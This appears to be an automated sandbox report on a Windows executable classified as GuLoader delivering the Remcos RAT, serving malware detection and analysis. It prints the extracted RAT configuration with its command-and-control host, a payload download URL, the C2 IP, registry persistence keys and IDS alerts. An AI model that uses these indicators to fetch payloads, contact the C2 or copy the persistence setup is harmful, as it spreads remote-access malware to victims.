Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IpykYx5iwz.exe

Overview

General Information

Sample name:IpykYx5iwz.exe
renamed because original name is a hash value
Original sample name:5aeb1293c473a66795bf0ff3a7892e6a6cf70aea5248a38f204632a5fdbe1f63.exe
Analysis ID:1588020
MD5:15214c528c41de4d5e542ebd3d4ac075
SHA1:bdab48d323ab0e0c4689061db5fb08adfe1afec8
SHA256:5aeb1293c473a66795bf0ff3a7892e6a6cf70aea5248a38f204632a5fdbe1f63
Tags:exeGuLoadersigneduser-adrian__luca
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops PE files with a suspicious file extension
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • IpykYx5iwz.exe (PID: 3608 cmdline: "C:\Users\user\Desktop\IpykYx5iwz.exe" MD5: 15214C528C41DE4D5E542EBD3D4AC075)
    • IpykYx5iwz.exe (PID: 180 cmdline: "C:\Users\user\Desktop\IpykYx5iwz.exe" MD5: 15214C528C41DE4D5E542EBD3D4AC075)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["subddfg.lol:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-A65UIX", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
00000001.00000002.4140572954.0000000005C5C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000000.00000002.1784802321.0000000005E8C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: IpykYx5iwz.exe PID: 180JoeSecurity_RemcosYara detected Remcos RATJoe Security

          System Summary

          barindex
          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\IpykYx5iwz.exe, ProcessId: 180, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\IpykYx5iwz.exe, ProcessId: 180, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key
          Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\IpykYx5iwz.exe, ProcessId: 180, TargetFilename: C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\IpykYx5iwz.exe, ProcessId: 180, TargetFilename: C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr

          Stealing of Sensitive Information

          barindex
          Source: Registry Key setAuthor: Joe Security: Data: Details: 48 54 74 EB 28 8C F8 84 30 0F D0 19 A7 A5 AD AB 1D DE E7 E2 6E DE 4A DE C2 3C 18 71 BC 63 AA 5A 1D D0 B1 69 54 87 55 5F CC 75 74 E1 66 45 98 AC 91 80 50 91 3E 39 2F C9 88 A8 7D 83 3B 33 9F 9B 8C 8A 12 42 D1 9C E1 83 11 30 34 76 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\IpykYx5iwz.exe, ProcessId: 180, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-A65UIX\exepath
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T20:39:14.698396+010020365941Malware Command and Control Activity Detected192.168.2.44973794.156.177.1642404TCP
          2025-01-10T20:39:37.086202+010020365941Malware Command and Control Activity Detected192.168.2.44973894.156.177.1642404TCP
          2025-01-10T20:39:59.513567+010020365941Malware Command and Control Activity Detected192.168.2.44982694.156.177.1642404TCP
          2025-01-10T20:40:21.908012+010020365941Malware Command and Control Activity Detected192.168.2.44995594.156.177.1642404TCP
          2025-01-10T20:40:44.295391+010020365941Malware Command and Control Activity Detected192.168.2.45000994.156.177.1642404TCP
          2025-01-10T20:41:06.685480+010020365941Malware Command and Control Activity Detected192.168.2.45001094.156.177.1642404TCP
          2025-01-10T20:41:29.092444+010020365941Malware Command and Control Activity Detected192.168.2.45001194.156.177.1642404TCP
          2025-01-10T20:41:51.468057+010020365941Malware Command and Control Activity Detected192.168.2.45001294.156.177.1642404TCP
          2025-01-10T20:42:13.857616+010020365941Malware Command and Control Activity Detected192.168.2.45001394.156.177.1642404TCP
          2025-01-10T20:42:36.234204+010020365941Malware Command and Control Activity Detected192.168.2.45001494.156.177.1642404TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T20:38:48.834449+010028032702Potentially Bad Traffic192.168.2.449736164.160.91.32443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: subddfg.lolAvira URL Cloud: Label: malware
          Source: 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["subddfg.lol:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-A65UIX", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
          Source: C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scrReversingLabs: Detection: 50%
          Source: IpykYx5iwz.exeVirustotal: Detection: 66%Perma Link
          Source: IpykYx5iwz.exeReversingLabs: Detection: 50%
          Source: Yara matchFile source: 00000001.00000002.4140572954.0000000005C5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: IpykYx5iwz.exe PID: 180, type: MEMORYSTR
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
          Source: IpykYx5iwz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: IpykYx5iwz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 0_2_00406444 FindFirstFileA,FindClose,0_2_00406444
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 0_2_00405909 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405909
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 0_2_00402765 FindFirstFileA,0_2_00402765
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 1_2_00406444 FindFirstFileA,FindClose,1_2_00406444
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 1_2_00402765 FindFirstFileA,1_2_00402765
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 1_2_00405909 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_00405909

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49737 -> 94.156.177.164:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49738 -> 94.156.177.164:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49826 -> 94.156.177.164:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50012 -> 94.156.177.164:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50011 -> 94.156.177.164:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49955 -> 94.156.177.164:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50009 -> 94.156.177.164:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50010 -> 94.156.177.164:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50013 -> 94.156.177.164:2404
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50014 -> 94.156.177.164:2404
          Source: Malware configuration extractorURLs: subddfg.lol
          Source: global trafficTCP traffic: 192.168.2.4:49737 -> 94.156.177.164:2404
          Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 164.160.91.32:443
          Source: global trafficHTTP traffic detected: GET /gmjzqcQFfx21.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.healthselflesssupplies.co.zaCache-Control: no-cache
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /gmjzqcQFfx21.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.healthselflesssupplies.co.zaCache-Control: no-cache
          Source: global trafficDNS traffic detected: DNS query: www.healthselflesssupplies.co.za
          Source: global trafficDNS traffic detected: DNS query: subddfg.lol
          Source: IpykYx5iwz.exe, Reaccented.scr.1.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: IpykYx5iwz.exe, Reaccented.scr.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/
          Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005BE8000.00000004.00000020.00020000.00000000.sdmp, IpykYx5iwz.exe, 00000001.00000002.4141067089.0000000007690000.00000004.00001000.00020000.00000000.sdmp, IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin
          Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin8
          Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005BE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin8m
          Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005BE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.binL
          Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/q
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownHTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 0_2_004053A6 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004053A6

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 00000001.00000002.4140572954.0000000005C5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: IpykYx5iwz.exe PID: 180, type: MEMORYSTR
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 0_2_00403384 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403384
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 1_2_00403384 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403384
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 0_2_004067CD0_2_004067CD
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 1_2_004067CD1_2_004067CD
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: String function: 00402B2C appears 48 times
          Source: IpykYx5iwz.exeStatic PE information: invalid certificate
          Source: IpykYx5iwz.exe, 00000000.00000000.1676427987.0000000000437000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecapillitia.exe4 vs IpykYx5iwz.exe
          Source: IpykYx5iwz.exe, 00000001.00000000.1781605887.0000000000437000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecapillitia.exe4 vs IpykYx5iwz.exe
          Source: IpykYx5iwz.exeBinary or memory string: OriginalFilenamecapillitia.exe4 vs IpykYx5iwz.exe
          Source: IpykYx5iwz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: IpykYx5iwz.exe, Reaccented.scr.1.drBinary or memory string: 2.VbP
          Source: classification engineClassification label: mal100.troj.evad.winEXE@3/18@2/2
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 0_2_00403384 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403384
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 1_2_00403384 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403384
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 0_2_00404661 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404661
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,0_2_00402138
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeFile created: C:\Users\user\Music\Udstyrelserne.iniJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-A65UIX
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeFile created: C:\Users\user\AppData\Local\Temp\nsk70B0.tmpJump to behavior
          Source: IpykYx5iwz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: IpykYx5iwz.exeVirustotal: Detection: 66%
          Source: IpykYx5iwz.exeReversingLabs: Detection: 50%
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeFile read: C:\Users\user\Desktop\IpykYx5iwz.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\IpykYx5iwz.exe "C:\Users\user\Desktop\IpykYx5iwz.exe"
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeProcess created: C:\Users\user\Desktop\IpykYx5iwz.exe "C:\Users\user\Desktop\IpykYx5iwz.exe"
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeProcess created: C:\Users\user\Desktop\IpykYx5iwz.exe "C:\Users\user\Desktop\IpykYx5iwz.exe"Jump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
          Source: IpykYx5iwz.exeStatic file information: File size 1727984 > 1048576
          Source: IpykYx5iwz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000000.00000002.1784802321.0000000005E8C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

          Persistence and Installation Behavior

          barindex
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeFile created: C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scrJump to dropped file
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeFile created: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeFile created: C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scrJump to dropped file

          Boot Survival

          barindex
